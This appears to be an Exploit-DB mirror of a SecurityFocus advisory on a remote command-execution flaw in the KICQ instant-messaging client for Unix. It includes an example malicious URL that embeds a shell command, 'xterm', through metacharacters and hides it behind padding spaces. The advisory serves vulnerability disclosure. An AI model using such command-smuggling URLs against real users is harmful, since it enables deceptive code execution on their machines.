exploit-db-mirror/exploits/unix/remote/20660.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

19 lines
No EOL
1,017 B
Text

source: https://www.securityfocus.com/bid/2443/info
KICQ is an ICQ-compatible interactive messaging client for Unix. Versions of KICQ are vulnerable to remote execution of arbitrary commands embedded in URLs.
A maliciously-composed URL containing shell metacharacters and shell commands can be sent in an instant message by an attacker.
When the KICQ user clicks this link, the hostile code contained in the URL will execute with the privilege level of the user running KICQ.
* Attacker composes malicious URL, ie:
http://www.attack.com/index.html'&xterm&'truehttp://www.attack.com </external/http://www.attack.com/index.html'&xterm&'truehttp://www.attack.com>..............................................................
('.' characters = spaces)
* To the target user, the above URL appears to be:
"http://www.attack.com/" </external/http://www.attack.com/>
* When the target user opens the URL, the shell commands contained within it (ie 'xterm') will be executed, potentially without warning to the user.